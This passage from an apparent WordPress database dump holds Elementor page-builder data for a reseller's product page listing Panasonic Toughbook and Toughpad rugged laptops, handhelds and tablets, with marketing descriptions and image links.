offering\\u00a0the world\\u2019s most rugged design. With drop-shock protection and a\\u00a0MIL-STD-810G certification, it\\u2019s the undisputed leader in the fully\\u00a0rugged category. Its Intel\\u00ae Core\\u2122 i5 processor packs a punch and it delivers amazing battery life\\u201419.5 hours, or 29 hours with the optional media bay\\u00a02nd battery. Combine six generations of delivering rugged performance\\u00a0plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div><\\/div><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6cc38cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a00781\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>A semi-rugged 14\\u201d laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen Intel\\u00ae processors running Windows\\u00ae 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3bc7e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f01603d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c925bd0\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 20\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"75026de\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"830958b\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-Q2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c5649b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1a9a32a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4b619a0\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/20mk2_laptop_right_angle_detached-1.jpg\",\"id\":2596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c9e08f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4d72a50\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/toughpad-q2-hero.png\",\"id\":2597}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e27844b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7c2e0fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9e46753\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\\\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c395c6f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f07ddc4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>From the industry leader in reliability comes the Panasonic TOUGHPAD\\u00ae FZ-Q2 12.5-inch 2-in-1 Windows\\u00ae 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"816152c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"488a087\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fb85606\",\"elType\":\"widget\",\"settings\":{\"title\":\"Handhelds\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fda2a67\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"b29f967\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b342b76\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK T1\",\"header_size\":\"h4\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"b63ad5d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed06566\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK N1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"711ad8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3256f2d\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-X1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"68ee5f8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"32bd399\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"284c9f7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-t1_image1-1_ss_1.jpg\",\"id\":2601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c1dba18\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"57df093\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-n1_mk2_android_image_2_1.jpg\",\"id\":2604}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6aba493\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b370c19\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/236380_F1X1_Hero.png\",\"id\":2603}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e414452\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"0318f25\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8fca4ad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae\\u00a0T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users won\\u2019t miss a beat with its great battery life, glove and rain touch enabled 5\\\" screen, 5 foot drop rating and IP66 and IP68 certification.\\u00a0 The TOUGHBOOK\\u00a0T1 is ready to be used by satisfied end users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07cdd64\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"380b880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae N1 \\u2014 a powerful, slim and fully rugged handheld. It\\u2019s the all-in-one tool you\\u2019ve been waiting for, and it\\u2019s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you won\\u2019t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Android\\u2122 operating system,\\u00a0giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers\\/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, don\\u2019t worry \\u2014 it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"730c08e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1efa495\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The TOUGHPAD\\u00ae FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.\\u00a0Thirty minutes of under five feet of water rugged.\\u00a0Ten foot drops onto solid concrete rugged. Built-in heater for -4\\u00b0 F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"645131d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5ec8bc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cea0ebe\",\"elType\":\"widget\",\"settings\":{\"title\":\"Tablets\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9a3b9cc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"ebdc4a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e27fe8\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK L1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"cf2e3fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ba5591e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-M1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"375c2e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4648e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-G1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c92f938\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"bb0c96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f6ee69c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-l1_right_ss.jpg\",\"id\":2609}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d16c223\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ca8b0be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-m1_image_01_new_win10.jpg\",\"id\":2610}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ddfa1b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ca5913e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-g1mk5_us_image02_ss.jpg\",\"id\":2611}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2a079e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"a6cb494\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"636c2cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Android\\u2122 OS based\\u00a07\\\" tablet that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used\\u00a0in the enterprise to collect information from workers in retail stores,\\u00a0warehouses field service, transportation and delivery or many other\\u00a0environments where work must occur belies its mild looking exterior.\\u00a0The TOUGHBOOK L1 has a quad-core processor and optional straight-shooting\\u00a0barcode reader from portrait to landscape, use a stylus pen or connect\\u00a0to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.\\u00a0This tablet\\u2019s users won\\u2019t miss a beat with its great battery life, glove and\\u00a0rain touch enabled 7\\\" screen, 5 foot drop rating and IP65 and IP67\\u00a0certification. The TOUGHBOOK L1 is ready to be used by satisfied end\\u00a0users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a926860\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30fc1f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic FZ-M1 is the fully rugged Windows\\u00ae tablet, built to\\u00a0enable mission-critical mobile worker productivity without compromise. Powered\\u00a0by Windows\\u00ae 10 Pro, the FZ-M1 features a long life, user-replaceable\\u00a0battery and a daylight-readable, high-sensitivity multi-touch display for use\\u00a0with heavy gloves. With the broadest range of configuration options available in\\u00a0its class, the highly customizable FZ-M1 is the ideal tool for today\\u2019s\\u00a0mobile workforce. In addition to the highly configurable options, added models\\u00a0of Thermal Camera, Real Sense Camera, RTK\\/GPS, as well as several more.\\u00a0Allows the FZ-M1 to be the most comprehensive 7\\\" tablet in the market.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"faa365e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a32d55e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experience\\u00a0while providing crucial port connectivity and feature-rich options in a compact\\u00a0size. Designed for highly mobile field workers, it\\u2019s the thinnest and lightest\\u00a0fully rugged 10.1\\\" tablet running Windows 10 Pro 64-Bit. Powered by an\\u00a0Intel\\u00ae Core\\u2122 i5 vPro\\u2122 processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobile\\u00a0computing. Add to that an HD daylight-readable 10-point gloved multi touch +\\u00a0waterproof digitizer pen, and it becomes an essential tool for field workers.\\u00a0With added Thermal camera and IR camera options.\\u00a0 Can also support \\\"Windows Hello\\\" for enhanced security.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ae37dad\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"aca729e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b56dd64\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-A2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"697550c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"46a580a\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-B2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d7ecd2\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ae2a70d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"fb7e441\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_fz_a2_hero_front-1.png\",\"id\":2612}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"34adf46\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3fc0690\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/prod-jtb2-hero.png\",\"id\":2613}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d0e7f24\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ff2d0d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"705b4b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>With the Android 6.0 (Marshmallow) operating system and Intel\\u00ae x5-Z8550 processor, the Panasonic TOUGHPAD\\u00ae A2 10.1-inch fully rugged Android\\u2122 tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPAD\\u00a0FZ-A2 tablet is up to the task.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e2f59f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0fedb48\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The rugged, 7-inch Panasonic TOUGHPAD\\u00ae FZ-B2, now powered by Android\\u2122 6.0.1 (Marshmallow) and the latest Intel\\u00ae AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options \\u2013 at a price within reach of any business \\u2013 the TOUGHPAD\\u00a0FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPAD\\u00a0FZ-B2 is built for long-lasting durability where others fail.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3429,2628,'_elementor_version','0.4'),(3649,2678,'_elementor_version','0.4'),(3652,2679,'_elementor_edit_mode','builder'),(3653,2679,'_elementor_template_type','post'),(3654,2679,'_wp_page_template','template-fullwidth.php'),(3655,2679,'_elementor_data','[{\"id\":\"292e187\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"19fa744\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9d3051\",\"elType\":\"widget\",\"settings\":{\"title\":\"Computer Toughbook\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18d10b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"330ac40\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"52bc26e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 33\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e3edb98\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_33_hero.png\",\"id\":2594}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2aad3d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 33 is the first fully-rugged 2-in-1 of its kind\\u2014redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\\\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboards\\u2014TOUGHBOOK 33 is built for maximum mobility.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6e91208\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be86921\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 31\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5da701a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb31_win10.jpg\",\"id\":2593}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4dfcd25\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<header class=\\\"product-details__header\\\"><\\/header><div class=\\\"buttons-bar product-details__dealers\\\"><span style=\\\"color: #333333; font-family: Raleway, Helvetica, Arial, sans-serif; font-size: 15px; font-weight: bold; letter-spacing: 2px; text-transform: uppercase;\\\">PRODUCT DETAILS<\\/span><\\/div><div class=\\\"product-details__description\\\"><div class=\\\"field field--name-field-product-details field--type-text-long field--label-above\\\"><div class=\\\"field__item\\\"><p>Panasonic presents the TOUGHBOOK\\u00ae 31, the reliable laptop offering\\u00a0the world\\u2019s most rugged design. With drop-shock protection and a\\u00a0MIL-STD-810G certification, it\\u2019s the undisputed leader in the fully\\u00a0rugged category. Its Intel\\u00ae Core\\u2122 i5 processor packs a punch and it delivers amazing battery life\\u201419.5 hours, or 29 hours with the optional media bay\\u00a02nd battery. Combine six generations of delivering rugged performance\\u00a0plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div><\\/div><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bb47d1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9db1fee\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 54\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"15ce475\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_54_hero.png\",\"id\":2595}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6a00781\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>A semi-rugged 14\\u201d laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen Intel\\u00ae processors running Windows\\u00ae 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3bc7e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f01603d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"75026de\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"c5649b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1a9a32a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c925bd0\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 